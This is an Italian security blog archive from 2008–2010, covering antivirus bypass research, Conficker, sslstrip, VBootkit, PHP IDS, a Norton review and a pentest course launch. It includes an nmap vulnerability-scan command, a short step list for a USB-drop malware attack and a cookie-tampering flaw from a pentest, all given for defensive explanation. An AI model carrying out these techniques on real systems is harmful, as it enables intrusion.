Sicurezza Informatica Made in Italy

Links for 2010-06-13 [del.icio.us]

2010-06-14T00:00:00-07:00

HTML5 Security Cheatsheet

Un Malware che bypassa qualsiasi Antivirus

2010-05-08T16:46:00.000-07:00

Esatto! Come avrei potuto farmi scappare quel tipo di notizia che prediligo.

Non perché io stia dalla parte dei ladri. In quel caso avrei l'indulto, scriverei libri e avrei le veline del settore della sicurezza in italia ai miei piedi.

Quindi assodato che il mio primo obiettivo è quello di spingere affinchè ci sia più sicurezza vi riporto una recentissima ricerca di matousec.com denominata
KHOBE – 8.0 earthquake for Windows desktop security software

Una sorta di race condition (per altro com un tasso abbastanza elevato di successo) infatti. permette ad un malware di bypassare tutti quegli antivirus che utilizzano la tecnica dell'SSDT hooking per interfacciarsi col kernel. Il caso vuole che il 90% degli antivirus in commercio usa questa tecnica.

La ricerca ad alto contenuto tecnico (e veramente molto interessante) è disponibile qui

Inutile dire che McAfee, Symantec e altre aziende dell'industria del marketing Anti-malware sono vulnerabili.
Una lista dei tool è la seguente (scusate, era troppo lunga e non mi entrava nella schermata):

eLearnSecurity : Il primo corso di pentesting in italiano

2010-04-30T02:20:00.001-07:00

In Italia il penetration testing è sinonimo di Tiger Team. Il tiger team è sinonimo di "oh mio dio".
Nella sicurezza informatica ci sono 2 casi in cui si arriva a imprecare:

Non hai assunto un tiger team e quindi ti hanno bucato
Quel tiger team che hai assunto ti ha bucato

E' chiaro quindi che il penetration test in Italia non esiste o è una pratica nuova su cui c'è ancora molta (giustificata) diffidenza. Del resto, se vuoi fare il penetration tester e ti senti un appestato sai anche con chi prendertela

Visto che il mercato del penetration testing in Italia quasi non esiste, ho deciso di scommetterci su, lanciando anche in italia il mio progetto eLearnSecurity, "Quello che CEH sarebbe dovuto essere", un corso avanzato di penetration testing (o ethical hacking) che sta riscuotendo un successo davvero inaspettato come si può leggere dal precedente link.

Il progetto vede come autori: il sottoscritto per la parte di Web Application Testing, Brett Arion per la parte di Network Security Testing e Vipin Kumar per la parte di System Security.

E' possibile visionare una demo del corso inserendo la propria email qui: http://www.elearnsecurity.com

Il corso avrà una sua localizzazione italiana, contenuti tradotti e corsi dal vivo, che vuole essere più un tentativo di portare in Italia ciò che all'estero è prassi ormai consolidata (il Certified Ethical Hacker è diventato un corso certificato dal Department of Defense americano) che un modello di business: non c'è domanda. Sarà forse perché non c'è offerta? Scopriamolo.

La sfida è un sasso nello stagno, un modo per conoscere nuove persone in Italia e perché no, un modo per cercare di far capire alle aziende che a volte l'attacco può essere la miglior difesa.

Links for 2010-04-02 [del.icio.us]

2010-04-03T00:00:00-07:00

Google Docs - Viewer
A secure PDF viewer

Norton 360 - L'acquasanta recensita dal diavolo - Parte 1

2010-03-25T14:50:00.000-07:00

Non sono mai stato tenero coi vendor di AntiVirus.
Li ho sempre considerati troppo lenti nella corsa all'ultimo malware e ho considerato l'approccio basato su signature obsoleto da almeno 5-7 anni.

Tuttavia, a Symantec devo riconoscere il fegato di aver contattato per una review, un blogger che ha scritto ben 3 post Anti-Antivirus nell'ultimo anno. Bravi. Meritate un'altra chance.

Ho ricevuto quindi una copia dell'ultima versione della suite Norton360 2010 (che sembra essere una delle più complete disponibili sul mercato) che ho potuto valutare per 2 settimane prima di comporre questa breve ma spero utile review.
In estrema sintesi elenco i punti salienti della suite. Non me ne vogliate per la sintesi. Non è da tutti scrivere libri su come installare un Antivirus.

Interfaccia
Buona. Decisamente buona. Partiamo infatti dal vero scopo dei vendor di Antivirus negli ultimi 10 anni: offrire una buona interfaccia ai loro antivirus.
Direi comunque che risulta estremamente semplice da utilizzare anche per i meno esperti e soprattutto occupa poca RAM. (Avranno mica letto i miei post?).
Pochi effetti grafici, straight to the point, nessun fronzolo. Bravi.

Feature
E' una suite. Ci trovate anche quello che non vi aspettereste/serve:

Antivirus (per fortuna)
Antispyware (come se gli spyware non fossero dei malware)
Protezione email/spam/phishing
Firewall
Ottimizatore di prestazioni
Backup

E' veramente una suite a 360 gradi. Si intuisce che l'obiettivo è quello di costituire un UTM per l'endpoint (O detto senza gergo: un penso-a-tutto-io-te-stai-su-facebook).
La sfida non è da poco ma è coerente con la tendenza ormai conoslidata di porre sempre più l'attenzione degli attacchi verso l'anello debole della catena: l'utente.
Quindi ottime intenzioni. Bene. La classica visione olistica della sicurezza.

Firewall
Il Firewall, mi desta qualche perplessità.
Sebbene sia assolutamente possibile configurare regole per filtri in ingresso/uscita sui vari protocolli/porte (layer 3-4), a livello applicazione deficita un po.

Di default ogni applicazione può accedere alla rete, cosa che non avviene con un personal firewall come Comodo (che per altro è gratuito).
L'utente non viene praticamente mai avvisato di eventuali connessioni in ingresso o in uscita da parte delle applicazioni.

E' tuttavia possibile agire sulla singola applicazione definendone il livello d'accesso in maniera molto granulare,
Il problema è: cosa pensa un utente medio? "Sono protetto, ho un Firewall. Eh wow, è così discreto che fa tutto senza chiedermi nulla".La realtà è un po diversa ed è il solito trade-off, incarnato dalla UAC di Microsoft:
Security o Usability?

Per intenderci, il Firewall di per sè è ottimo e molto flessibile, ma la protezione con la configurazione di default, per un utente medio potrebbe essere del tutto insufficiente.

Onestamente, la protezione Firewall offerta dal gratuito Comodo, sembra migliore per l'utente medio.

Antivirus
Norton è un Antivirus. Quindi offre il suo meglio quando gioca in casa.
C'è poco da dire nel supporto alla rilevazione di threat basata su signature se non parlare della frequenza di aggiornamento (sigh).

Rispetto ad altri antivirus offre un aggiornamento continuo delle definizioni (anche 10 volte al giorno), poichè queste vengono scaricate non in blocco bensì man mano che queste vengono aggiunte al database. E questo è sicuramante un punto a favore.

La protezione è comprensiva di adware, spyware, keylogger e persino rootkit! (ora non pensiate di proteggervi dai rootkit avanzati quando ancora non esiste una protezione dagli 0-day).

Inoltre mi sembra da elogiare l'attenzione posta sul phishing e lo spam.

I canali di protezione sono i tradizionali:

Outlook (plugin)
Navigazione web (download e pagine visitate)
Office (documenti MS Word...)
Dischi removibili (usb drive, schede SD/MMC...)

Ma veniamo al sodo. Come ho già avuto modo di dire mille volte, l'approccio per definizioni va bene per minacce su larga scala ma è del tutto *inutile* per minacce serie, mirate (sento qualcuno dire APT, APT, APT...).

Verizon, operatore mobile americano, risparmia in Belen, e coi soldi ci finanzia delle ottime ricerche nel campo della sicurezza e degli ottimi report sui data breach.
L'annuale Verizon DBIR è ormai uno dei report di fine anno più attesi.
Questo uno dei grafici inclusi nel DBIR 2009:

Inutile commentare: c'è un forte incremento dell'uso di malware nei data breach. L'80% dei data breach nel 2008 ha interessato l'uso di malware. Nel 59% dei casi era un malware custom-made e per questo difficilmente rilevabile da un Antivirus.

Most common in 2008, however, was malware that had (apparently) been created for the attack(s) entirely from scratch. In a rather sobering statistic, 85 percent of the 285 million records breached in the year were harvested by custom-created malware

Norton in questo senso impiega il cosiddetto SONAR 2 . Tecnologia acquis-tata da Symantec nel 2005. Il SONAR si basa sul "comportamento" più che sulla signature ed ha fatto la sua prima apparizione nel 2008.

2008? Si. Questa è la strada giusta da seguire anche se con una decade di ritardo.

Da segnalare qualche falso positivo: tool che vengono segnalati come infetti quando non lo sono.
Se poi siete un pentester con metasploit ed una miriade di altri tool del mestiere installati può diventare un vero inferno (in quel caso, la prima cosa da fare è configurare le esclusioni).

Conclusioni
Norton360 mi sembra in fin dei conti una buona suite.
Non essendo questa recensione una prova comparativa e mancando di test affidabili mi astengo da qualsiasi giudizio negativo. Tuttavia mi sembra di poter dire che forse i tempi sono maturi per nuove tecnologie di rilevazione degli attacchi che coinvolgano i recenti avanzamenti in termini di virtualizzazione.

Lungi dall'essere la soluzione ad ogni problema di sicurezza desktop, Norton non richiede più un cluster di CPU, è di facile configurazione ed ha il giusto approccio alla sicurezza personale.
A 360° appunto.

Continuate così, siete ancora indietro ma sulla buona strada.

[Nei prossimi giorni proporrò dei test su strada in cui mettere seriamente alla prova Norton, con malware customized]

Dove eravamo rimasti...

2010-03-12T15:24:00.000-08:00

Rieccomi,
Dall'ultima volta che ho scritto su questo blog tante cose sono cambiate nel settore:

Abbiamo scoperto che non siamo più in grado di calcolare un perimetro, figuriamoci di proteggerlo (è il 2010 signori)
Le nuvole ci faranno risparmiare (finchè non decideremo di cambiare nuvola e allora lì si che saranno dolori)
L'APT è un nuova malattia da curare con l'ultimo tool di X

Un po di FUD e un po di nuovi acronimi da dare in pasto al reparto vendite e la crisi è alle spalle.

Per quanto mi riguarda, sono stato colpevolmente lontano dallo scrivere sul blog a causa (o grazie?) del mio ultimo progetto :

Vi risparmio una serie interminabile di termini cari ai venditori (che ho dovuto aimè imparare) per introdurvi in maniera diretta e concisa all'idea.

eLearnSecurity è un azienda start-up (si ci metto faccia, soldi e quelle 4 cose che ho imparato) che ha come obiettivo quello di creare corsi avanzati di sicurezza informatica sfruttando le migliori tecnologie di e-learning.

Il primo corso che andremo a lanciare entro (si spera) un paio di settimane sarà Penetration Testing Course - Professional.

Questo corso vede come autori:

Brett Arion
Pluri certificato, responsabile della sicurezza di BlueCross SC, consigliere FBI e con oltre 15 anni di esperienza nel settore dell'ICT Security
Autore della sezione Network Security Testing
Vipin and Nitin Kumar
Con Johanna Rutkowska probabilmente i ricercatori più famosi nel settore della System Security. Il loro nome è legato al VBootkit, BIOS Rootkit per Windows Vista e Windows 7 presentato a Black Hat US 2009.
Autori della sezione System Security
Armando Romeo
Sono io. Diciamo che ho svolto qualche decina di test per organizzazioni di grande dimensione. Sono autore della pubblicazione di oltre 100 security advisory.
Trainer ma anche Manager in Security Brigade.
Autore della sezione Web Application Testing

Nei prossimi post vorrò parlarvi del perché della creazione di un corso di penetration test.

Intanto potresete fare un antipasto con la preview del nostro corso

Alla prossima

Google - Cina : un attacco informatico senza precedenti

2010-01-12T16:05:00.001-08:00

In un post rilasciato pochi minuti fa, che ha fatto il giro del mondo, Google annuncia 2 notizie clamorose:

Un attacco Cinese è riuscito nel furto di proprietà intellettuale di Google e di altre 20 tra le più grandi aziende americane
Google eliminerà ogni filtro e censura da Google.cn in virtù di questi attacchi a costo di dover chiudere le sue basi in Cina

Il post è disponibile qui

Links for 2009-12-30 [del.icio.us]

2009-12-31T00:00:00-08:00

Phoenix/Tools - OWASP

Links for 2009-10-27 [del.icio.us]

2009-10-28T00:00:00-07:00

Manipulating_SQL_Server_Using_SQL_Injection.pdf (Oggetto application/pdf)

Links for 2009-10-12 [del.icio.us]

2009-10-13T00:00:00-07:00

Creazione di un flusso di lavoro - SharePoint Designer - Microsoft Office Online

Links for 2009-10-04 [del.icio.us]

2009-10-05T00:00:00-07:00

ArticleXSSInJavaScript - doctype - HOWTO filter user input in JavaScript context - Project Hosting on Google Code

Links for 2009-09-01 [del.icio.us]

2009-09-02T00:00:00-07:00

EasyVMX!: Virtual Machine Creator

Symantec Spam Report maggio 2009 - La febbre suina corre sul web

2009-05-26T03:08:00.000-07:00

Gli spammer, è noto, mangiano pane ed attualità ed è proprio dagli avvenimenti quotidiani che traggono la migliore ispirazione per lanciare sul web i loro virus contagiosi.
Ed è così che la febbre suina da virus pandemico per l’uomo si trasforma in virus pandemico per PC. Infatti nella top 20 di maggio riguardante i subject di email spam il denominatore comune è proprio la febbre suina!

Ma la paura umana di contrarre malattie non è il solo punto debole individuato dagli spammer, che hanno anche “giocato” con gli affetti colpendo la Festa della Mamma.

E ancora una volta Obama e i suoi 100 primi giorni alla Casa Bianca…

Sono solo, questi, degli esempi riportati dallo State of Spam Report di maggio rilasciato da Symantec, la ricerca mensile che mira ad offrire una panoramica generale sulle tendenze dello spam.

Il report completo è scaricabile al seguente link: http://eval.symantec.com/mktginfo/enterprise/other_resources/b-state_of_spam_report_05-2009.en-us.pdf

Maggiori informazioni ed approfondimenti in occasione del Symantec Technology Day Scenario 2009. Milano, Teatro Franco Parenti, 9 giugno 2009, ore 9.30.
Per registrazione e maggiori infromazioni: http://symantec.freedatalabs.com
Per inviare in anteprima domande ai relatori: http://www.facebook.com/pages/Symantec-Technology-Day/74719484173

Symantec Technology Day Scenario 2009

2009-05-21T03:37:00.000-07:00

Con grande piacere segnalo il seguente interessante evento:

Symantec Technology Day Scenario 2009 - Milano, 9 giugno 2009, Teatro Franco Parenti.

Sale sul palco del Teatro Parenti di Milano SCENARIO, l'evento dell'anno targato SYMANTEC. Nella mattinata, condotta da Beppe Severgnini, sarà presentata una panoramica sulla situazione attuale e sulle previsioni future del business. E di seguito la proposta Symantec in tema di storage, security, availability e data management. Il pomeriggio sarà dedicato a tre sessioni parallele per affrontare dal punto di vista tecnico e del ROI i temi proposti.

Maggiori informazioni e registrazione:

:: Symantec: http://symantec.freedatalabs.com

:: Facebook: invia in anteprima le tue domande ai relatori e scopri tutto sugli eventi e le pubblicazioni symantec http://www.facebook.com/groups.php?ref=sb#/pages/Symantec-Technology-Day/74719484173

VBootkit 2.0 per Windows 7 rilasciato

2009-05-07T15:04:00.000-07:00

Vipin & Nitin Kumar hanno rilasciato il Vbootkit 2.0 che tanto ha fatto parlare di loro in passato.

I ragazzi indiani, coi quali tutt'ora lavoro, sono diventati famosi dopo il Vista Bootkit 1.0 presentato al Black Hat USA 3 anni fa. La presentazione solo-audio, per non farsi riconoscere in viso, ne aumentò la fama e ne alimentò la leggenda che almeno per una volta posso testimoniare essere giustificata.

I due, età 24 anni, sono riusciti a bypassare questa volta tutte le procedura di sicurezza di Windows 7, ancora una volta, caricando un programma al boot del computer. (da qui il nome)
Tale programma è in grado di fare un hook della INT 13, e di patchare innanzi tutto bootmgr.exe e poi via via tutti gli altri programmi eseguiti al boot ancor prima che le funzioni di sicurezza di windows vengano attivate. E' così possibile assumere il pieno controllo della macchina senza lasciare alcuna traccia su disco. Una volta lanciato il bootkit, le possibilità sono infinite (alcune, come keylogging e bypass del DRM sono state dimostrate dal vivo).

Da notare che perché tutto ciò avvenga è necessario avere accesso fisico alla macchina oppure privilegi di Amministratore.

Le metodologie utilizzate dai due sono davvero molto sofisticate. A chi avesse conoscenze di Kernel windows, e programmazione assembler, consiglio di leggere direttamente le slide della presentazione all'ultimo HITB Dubai dove i due hanno presentato il VBootkit 2.0.

E' possibile scaricare il codice sorgente da NvLabs

Conficker - Italia tra le più colpite

2009-04-04T06:58:00.000-07:00

Il conficker worm si è conquistato il suo spazio anche nei telegiornali. Tiene col fiato sospeso milioni di utenti di internet. E fa tirare un sospiro di sollievo alle aziende produttrici di Antivirus che almeno per qualche mese possono far fronte alla crisi economica con un discreto aumento nelle vendite .

A parte la guerra di cifre a cui anche noi italiani siamo abituati da tempo ( "Siamo 1 milione" (in una piazza che ne può contenere 50,000)) , la diffusione da Settembre 2008 a oggi sembre essere su larga scala. Cifre di F-Secure contano in 1-2 milioni i PC infetti. Altri parlano di 9-10 milioni.

I computer italiani e tedeschi sembrano essere tra i più colpiti in europa (in percentuale alla popolazione internet) :

Non che questi numeri siano attendibili, ma questo dovrebbe far riflettere sulle abitudini nostrane. (Siamo comunque in ottima compagnia. Gli amici della east coast americana non sono messi molto meglio)

La vulnerabilità ms08-67 su cui si basa Conficker è nota da Settembre e patchata in Ottobre.

Il worm da allora ha avuto un evoluzione, da semplice worm, con qualche errore di progettazione, a complesso software distribuito con tanto di utilizzo di ultime tecnologie del settore (una fra tutte l'algoritmo di hashing MD6 pubblicato in Ottobre dai ricercatori del MIT capeggiati da Rivest).

Dopo la fatidica data del 1 Aprile, che i media ci avevano detto essere l'apocalisse di Internet, il worm è approdato alla versione C scaricando nuovi aggiornamenti e istruzioni da 500 domini scelti casualmente su 50,000 a disposizione dei creatori. (Un algoritmo viene utilizzato e per ogni nome di dominio generato dall'algoritmo viene inviata una richiesta in polling per ricevere nuovo codice da eseguire. Se la risposta è codice binario, viene caricato ed eseguito sulla macchina infetta, altrimenti si procede con il prossimo nome di dominio nell'algoritmo).

Con la versione C, Conficker è anche in grado di fare a meno di punti di rendez-vous fissi (server a cui collegarsi per ricevere informazioni/codice). Un complesso sistema di peer to peer è stato inserito nel codice. E' chiaro che più tempo passa, più i creatori avranno modo di raffinare il loro prodotto e renderlo sempre più difficile da fermare.

Fino ad ora tuttavia, a parte le notizie sulla diffusione, Conficker non sembra essere un virus molto cattivo (quasi un carmelitano scalzo in confronto al Blaster del 2003). A parte la variante A, quella dell'autunno 2008, che furtivamente collezionava login, carte di credito e documenti per poi inviarli a vari server, non si notano particolari azioni malevole.E' proprio per questo che i ricercatori aspettano le prossime mosse dei creatori del worm.
Il pericolo che l'infezione si trasformi in Botnet è reale.
Se pensiamo che aziende che fanno dello spam il loro business hanno pagato e pagano decine e anche centinaia di miglia di dollari per l'utilizzo di botnet di 50-100,000 membri,
il valore monetario di Conficker sarebbe davvero alto.

Per concludere consiglio 4 semplici passi:

Verificare se siete infetti semplicemente navigando qui
Utilizzare questo tool gratuito per rimuovere conficker
Fare una scansione della vostra rete con nmap ultima versione per verificare la presenza di computer infetti
nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args safe=1 [targetnetworks]
Non farsi prendere dal panico. Siamo lontani dai tempi di Morris. Gli hacker sono ormai in cerca di denaro, non di pagine sui libri di storia.

Per chi volesse approfondire sul funzionamento del Conficker è disponibile un ottimo writeup aggiornato frequentemente qui

sslstrip - Nuovi attacchi ad SSL

2009-03-19T06:53:00.000-07:00

Innanzi tutto ringrazio Brett Arion per la cortesia di avermi segnalato questa nuova e interessante ricerca presentata da Moxie Marlinspike all'ultimo Blackat DC.

Moxie è il creatore del primo tool per lo sniffing su ssl, sslsniff, incluso in Backtrack e da tempo il tool de facto per questo tipo di attacco man in the middle.

Questo tool era in grado, appunto, di iniziare un attacco man in the middle tramite arpsoof (un tool di arp cache poisoning) e di fornire al client vittima un certificato valido sfruttando una vecchia vulnerabilità in internet explorer. Tale vulnerabilità era resa possibile dal fatto che molti browser dell'epoca non validavano il campo BasicConstraints del X509 in cui era settato il bit CA=FALSE rendendo perciò possibile la firma di un altro certificato con un certificato foglia.
(La foglia non era più tale ma diveniva essa stessa CA).

L'attaccante, generato on-the-fly un nuovo certificato valido per il server , avrebbe poi decifrato dal client e cifrato verso il server (e viceversa), loggando tutto il traffico SSL decifrato.

sslstrip invece, ha su un approccio completamente diverso.
La ricerca di Moxie si basa su alcune osservazioni:
Le connessioni passano da http a https attraverso

Redirect (302)
Link

L'uomo nel mezzo è quindi in grado di intercettare tali richieste. Inizializzare una richiesta https al server web, ma forzare il client a continuare la sua sessione in http. In definitiva l'html fornito al client è del tutto simile alla sua versione cifrata, in modo tale da non insospettirlo.Questo viene ottenuto servendo le richieste del client con http piuttosto che https.

I risultati mostrati da Moxie si riferiscono all'utilizzo di sslstrip su Tor network per 24 ore:

Le slide della conferenza sono disponibili qui. Mentre qui è presente il video.

PHP IDS e Web Application firewall

2009-03-15T03:33:00.000-07:00

Non che sia un fan degli IDS o Firewall a livello applicazione per la protezione delle applicazioni web. Ma reputo PHP IDS un progetto molto valido che va nella direzione di mitigare tutte quelle vulnerabilità di input validation ancora così comuni.

Parliamo di SQL injection, remote e local file inclusion, XSS, HTTP response splitting, cookie manipulation.

PHP IDS è un progetto open source, scritto in PHP, ideato da Mario Heidrich, giunto alla versione 0.5.4, abbastanza stabile e in grado di assegnare uno score ad ogni payload ritenuto malevolo e comportarsi di conseguenza: è possibile bloccare la richiesta (a livello PHP, non di rete), fare un redirect o qualsiasi cosa si possa fare con PHP.

La libreria PHP di PHP IDS viene inclusa in ogni pagina del sito web. La libreria andrà a valutare le variabili $_COOKIE, $_SERVER, $_POST, $_GET basandosi su delle signature aggiornate frequentemente e disponibili gratuitamente dal sito del progetto PHP IDS in formato xml.

Il log delle attività è disponibile in formato txt, su email o su database.
La natura open source permette l'adattamento e l'ampliamento verso qualsiasi tipo di utilizzo.

L'overhead associato all'attività di controllo delle variabili è minimo per siti di medio piccole dimensioni (L'ho personalmente testato su Hackerscenter.com che conta una media di 14,000 richieste al giorno senza nessun rallentamento).

Elencate le note positive, cosa c'è di sbagliato nell'approccio automatizzato basato su IDS/Firewall?
Innanzi tutto, Web application firewall o IDS a livello applicazione in ambiente web (livello 7) non arriveranno mai ad essere il silver bullet per la sicurezza web come lo sono stati i loro corrispettivi a livello 3. (per un certo periodo)

I Firewall di rete operando su protocolli di rete standard sono molto efficaci nel riconoscimento delle minacce.

L'ambiente web è un ambiente estremamente eterogeneo. Ogni applicazione ha una logica di funzionamento a se stante. Il controllo delle variabili di input utente è solo la punta dell'iceberg.

Vulnerabilità come CSRF, Http session fixation o logic flaws non potranno mai essere riconosciute con approcci Firewall.

In uno dei miei ultimi penetration test, mi sono trovato ad analizzare un'applicazione web che faceva da client FTP per la trasmissione di file all'interno del pannello di controllo di un servizio di hosting.
La vulnerabilità riscontrata era resa possibile dalla errata configurazione di IIS che non isolava le directory utente unita ad un logic flaw (che non è un baco nel software ma un modo errato di scrivere la propria applicazione).

La cartella in cui si andava scrivere sul server veniva recuperata dal COOKIE.
Modificando semplicemente l'userid all'interno del cookie era possibile operare su directory dedicate ad altri utenti. (Nota: Nessuna directory traversal)

Il cliente aveva a disposizione una soluzione di Web application firewall, costata non poco, che andando alla ricerca di payload malevolo, non era in grado di rilevare un tale exploit visto che la richiesta generata era completamente priva di ogni tipo di attacco riconoscibile.

Può sembrare un caso raro ma non lo è.
Soluzioni basate su firewall, sono apprezzabili come risposta alle minacce a breve termine.

La sicurezza di un applicazione web si raggiunge tenendo in conto la sicurezza del codice sin dalla progettazione dell'applicazione stessa o attraverso un analisi del codice sorgente a posteriori.

La crisi dell'IT Security

2009-02-06T05:20:00.000-08:00

O dovremmo dire la crisi che non c'è stando al report di SANS Institute e Foote partners.

I posti di lavoro nel settore dell'ICT Security sembrano essere i più sicuri secondo quanto emerso in un survey di 2,120 security executive di aziende con 10,000 - 40,000 dipendenti operanti in 16 diversi settori.

I dati emersi sono:

79% degli intervistati non prevede nessun licenziamento nel 2009
54% degli intervistati non prevede alcun aumento di personale
Solo il 3% prevede un taglio di personale

Ma la cosa più importante che salta all'occhio è la variazione di mansioni ricoperte dal personale di IT Security. C'è un graduale passaggio a competenze più "hands on" come penetration testing, ethical hackingm computer forensics e hardening in generale.

La causa si può ricondurre all'aumento dei data breach e al bisogno di soluzioni di sicurezza "veloci" e di immediata utilità.

L'effetto è quello di operare meno in outsourcing e di più in-house.
Ed è proprio riguardo all'andamento dei servizi di ICT Security che mi piacerebbe leggere un qualche report. E' in questi casi che la crisi si farà sentire maggiormente.

Nonostante le prediche di ottimismo di chi non sa leggere le statistiche, chi opera nel settore dei servizi per la sicurezza tocca la crisi con mano.

Dalla ricerca di SANS si calcola che gli stipendi, negli Stati Uniti, per il settore IT Security siano cresciuti quest'anno fino a toccare i $72,000 per personale con esperienza inferiore ai tre anni.
Un budget per la sicurezza invariato ma reindirizzato verso i propri dipendenti in termini di corsi di formazione e aumento di stipendi determina comunque una crisi del settore per tutte quelle aziende specializzate che operano nel settore dei servizi.

Ma ci sono anche implicazioni pratiche.
Servizi come penetrationt testing o vulnerability assessment richiedono competenze tecniche specifiche che non si acquisiscono con corsi di aggiornamento semestrali interni alle aziende (anche se fosse, 6 mesi nel settore della sicurezza possono essere un'enormità). Abbandonare l'outsourcing in favore del personale interno non è detto che sia una buona scelta. Soprattutto se si abbandona qualsiasi analisi del rischio in favore di soluzioni a breve termine che possano garantire la semplice sopravvivenza digitale.

Quanto tempo ci vuole per formare un penetration tester? (che da definizione dovrebbe essere esterno all'organizzazione) . Il semplice concetto di penetration tester in-house è un ossimoro.

Il reengineering dei processi va fatto in un momento di stallo come quello attuale.
Sopravvivere alla giornata è un lusso che non ci si può permettere tanto a lungo.

Windows 7 beta gratuito

2009-01-08T01:37:00.000-08:00

E' di oggi la notizia della possibilità di scaricare Windows 7 beta 1 gratuitamente da MSDN/Technet

Le prime impressioni di chi lo ha provato sono di grande stabilità, velocità migliorata e maggiore controllo sul livello di sensibilità dell' UAC (il vero fiasco di Windows Vista).

Il download della beta è disponibile qui

Nota: I download sono limitati a 2,5 milioni = pochissimi giorni

Babbo, voglio un cluster di PS3

2008-12-30T11:33:00.000-08:00

Le Play Station 3 usate in parallelo per trovare le collisioni MD5 erano 200 e non 100.

Eccole qui:

Rogue CA attraverso collisioni MD5

2008-12-30T07:12:00.001-08:00

Sarà una data che ricorderanno in molti, perché è stata data prova per la prima volta di un attacco pratico che sfrutti le collisioni dell'algoritmo di hashing più diffuso: MD5.

Gli hash MD5 vengono utilizzati per la firma digitale di molti certificati di root pre installati nei browser. Questi certificati di root appartengono a delle Certification Authority note che a loro volta firmano i certificati dei vari siti web.

Proprio nella mattinata di oggi è stata resa finalmente pubblica la ricerca di Alex Sotirov e altri, che dimostra la creazione di CA fasulle in grado di essere riconosciute come legittime da tutti i browser in circolazione (non è una vulnerabilità nei browser, stiamo attenti).

Tale minaccia apre il fronte a nuovi attacchi di phishing. Una CA fasulla è in grado di firmare un certificato anch'esso fasullo ma riconosciuto come legittimo da qualsiasi browser.

Una chicca resa nota da Sotirov in twitter è che per la generazione delle collisioni sono state utilizzate 100 Play station in parallelo (trovare due stringhe diverse che diano lo stesso hash è un'operazione molto esosa in termini di potenza di calcolo).

La ricerca completa è qui

L'anno si chiude coi migliori auspici....Buon anno a tutti....

Proteggersi senza l'Antivirus

2008-12-23T15:40:00.000-08:00

Dopo aver sepolto l'Antivirus in uno dei precedenti post, mi sembra corretto ampliare il discorso introducendo alcune utility di facile utilizzo che se entrassero a far parte delle nostre abitudini quotidiane, limiterebbero al minimo l'esposizione del proprio computer a virus e malware.

La prima utility è Sandboxie (gratuito). Già citata qui, ci permette di avviare qualsiasi eseguibile di origine sconosciuta o sospetta senza che questo possa effettivamente danneggiare il sistema.
Sandboxie permette di lanciare applicazioni le cui modifiche al sistema rimarranno valide solo all'interno della sandbox che farà da strato aggiuntivo per il sistema operativo. Questo significa che l'applicazione funzionerà come se la sandbox non ci fosse, e il sistema operativo come se l'applicazione non fosse stata eseguitata.

Da notare che un programma all'interno della sandbox non sarà in grado di apportare modifiche all'esterno. Questo significa che lanciando un browser in sandbox annulla completamente il rischio di essere infettati da malware, spyware e adware, in quanto al momento della distruzione della sandbox nulla sarà rimasto nel sistema operativo.
Sandboxie è un programma gratuito altamente personalizzabile e con caratterisitiche davvero avanzate.

Fate un favore alla vostra intelligenza. Invece di navigare 100 forum per capire qual'è il migliore antivirus, leggete le FAQ di Sandboxie e iniziate ad usarlo.

Uno dei motivi che mi spinse ad installare un Antivirus, fu la diffusione, qualche anno fa, delle pen drive. Una vera piaga. Utilissimi per carità, non se può fare a meno. Ma sono stati una vera manna per i diffusori di malware.

Comprate 10-20 pen drive da 256Mb, (ormai c'è chi le regala...).
Caricateci su un virus.
Spargete queste pen drive in luoghi affollati.
Qualcuno le troverà e le inserirà gioiosamente nel proprio laptop.
Ed ecco fatto, risalire all'autore del virus è praticamente impossibile.

Tutti i principali malware moderni sono in grado di replicarsi su qualsiasi disco removibile
connesso al computer e tramite questo su altri computer.

Proprio per questo un utility come USBFirewall (gratuito) è veramente un valido aiuto. Molto più utile di un antivirus perché blocca l'esecuzione di qualsiasi programma all'inserimento del disco nella porta USB.

Molti dei virus in circolazione sfruttano exploit per vulnerabilità già note per cui è disponibile una patch. Un esempio è il Conficker worm che sfrutta la vulnerabilità MS08-067

Secunia PSI è a mio parere il miglior software per la sicurezza del 2008. Permette di tenere tutti i programmi installati nel PC aggiornati all'ultima patch in maniera semplice, non invasiva e anche gratuita.

Le utility sopracitate sono per la prevenzione delle infezioni. Utility indispensabili alla diagnosi sono invece CurrPorts (gratuito), Autoruns (gratuito). La prima ci permette di verificare quali processi hanno connessioni aperte e qual'è l'indirizzo remoto.
La seconda è la migliore utility per la gestione dei pricessi e servizi in esecuzione all'avvio di Windows.

Per quanto riguarda la cura, a parte un Antivirus (69 €), consiglio Gmer (gratuito), uno dei migliori per il riconoscimento di rootkit e SpyBot (gratuito) per la rimozione di spyware/adware.

Io la mia parte l'ho fatta...

Buon Natale a tutti...

Consigli per gli acquisti

2008-12-13T02:55:00.000-08:00

Vacanze di Natale. Un po più di tempo per leggere. Se non volete regalarvi uno di questi o continuate a sognare questo potete continuare a leggere questo post.

Questa è una reading list di libri di sicurezza informatica che ho trovato più interessante negli ultimi mesi.

The Security Risk Assessment Handbook - Douglass Landoll

Senza dubbio il miglior libro per chiunque si avvicini per la prima volta a questo argomento o per chi abbia bisogno di rivedere certe procedure. Un libro che ogni consulente o esperto dovrebbe leggere. L'autore fornisce esempi pratici passo-passo oltre ad un ottima infarinatura di teoria.
Un approccio basato sulla priorità del rischio è fondamentale per indirizzare il budget di spesa nella giusta direzione. - Table of content

Security Metrics: Replacing Fear, Uncertainty, and Doubt - Andrew Jaquith

Dopo aver letto Risk Assessment Handbook, Security metrics è la giusta continuazione in un filo logico che parte dall'analisi del rischio alla distruzione dello stesso. Security Metrics tocca il nervo scoperto della sicurezza: l'assenza di metriche affidabili e universalmente accettate che quindi rende l'analisi del rischio un processo non più scientifico con risultati certi ma un processo fortemente soggettivo.
L'autore propone approcci scientifici oggettivi alla misurazione dell'efficacia delle varie soluzioni di sicurezza. Risk Assessment Handbook e Security Metrics sono i libri che più mi hanno arricchito dal punto di vista professionale.

Professional Pen Testing for Web Applications - Andres Andreu

Andres è un amico da anni. Uno dei migliori penetration tester in circolazione. E ha scritto l'unico libro di penetration testing da professionista a professionista. Andres si sofferma sull'approccio scientifico da seguire piuttosto che sulle varie vulnerabilità delle web applications di cui, comunque, ne delinea le caratteristiche principali e come rilevarle.
Fornisce utilissimi consigli su come organizzare e portare a termine in modo efficiente un penetration test attraverso esempi, tabelle e consigli frutto di una lunghissima esperienza nel settore. Un must have. (p.s. nel libro troverete anche una recensione di Hackers Center di cui Andres è avido lettore)

E ora la consueta striscia del sommo Dilbert...

0day in Internet Explorer7 - Exploit pubblico

